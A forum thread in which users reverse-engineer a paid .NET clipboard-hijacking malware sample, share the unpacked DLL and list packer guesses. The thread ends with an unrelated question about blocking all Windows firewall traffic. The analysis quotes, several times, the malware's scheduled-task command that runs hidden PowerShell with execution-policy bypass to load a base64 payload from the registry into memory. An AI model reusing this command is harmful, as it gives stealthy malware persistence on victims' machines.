Forums

Unpacked this Crap LOL   Here You go with the File. Kthmngiucgrhcdpxszzwg_BH_unp.dll

yep he tried to bypass windows defender to make payload run on memory there by converting his payload to base64 i see. ( based on powershell command ) with those strong packers i dont think its possible to unpack crap 

some simple only for  analisis: step 0:  exe in dnspy   step 1: resource extract and save as .zip step 2: .exe in that zip, is the program(malware ) dll  in .net packed with Microsoft Visual C# / Basic.NET  - * IntelliLock v.1.5.x.0 ( .NET Reactor* )  (Kthmngiucgrhcdpxszzwg.dll)  there is executed with some like this:   C:\Windows\System32\schtasks.exe" /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)" virustotal: https://www.virustotal.com/gui/file/5694a409003d8f855a17761d9ebce7cfd0f30490fa5340d9a3e1b55ce75cd5be/behavior   Processes Created C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) Shell Commands schtasks /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)" Processes Terminated C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) Processes Tree 2120 - Unpack me.exe 2628 - C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) packer? vmprotect +intellilock , or some ofuscator like ILProtector +intellilock    Best regards Apuromafo  

this malware belongs to some famous coders he sell it for over (100$) i somehow managed to steal it from someone who bought it its a malware it uses power shell, it only access clipboard to replace it but dosent steal data i dont know more about it. the packer had me so much confused unpack if u can. edit: if it got unpacked i will share the seller website! Unpack me.rar

Hi again, just have some more little questions about the firewall rules.So as I see it right then I just need to create 2 new rules to BLOCK all IN & OUT going connection as I post one post before above. It seems that I also need to change the Firewall settings itself for all domains what means I have 1) enable the Firewall and 2) setting the In&Out Bounds connection settings to block.Maybe its just optional so I'am not sure yet about whether its just enough to ENABLE Firewall & Creating my 2 rules which should block all. Now I was looking how I can find out the firewall settings to backup them before I change it.As I see it right then I can read them from registry and change them there. ... So that means I can read the parameters from registry of all 3 domains I can backup so far.So my question now is whether I "must or not" change the main IN & OUT Bound paramters (to any state) IF I have created a own block rule?Its a bit contfusing a little.Lets say I just enable the firewall for all domains and the In&Out settings above are set to allowed BUT I have created a In&Out rule to Block All.What happens then?Otherwise when I set the InBound setting to Block All then I also don't need to create a rule for In Bounds.So at the end I just wanna Block all In&Out connections and then restoring the original state back.If anyone has some more hints how the settings here must be set correctly to Block ALL (In/out/under/over/whatever directions are comming from) then just tell me. PS: Does it play a role whether I enable the Firewall with netsh command (CreateProcess/Cmd) or changing directly in registry (using Reg functions to set)?I must use the reg functions to read the states. greetz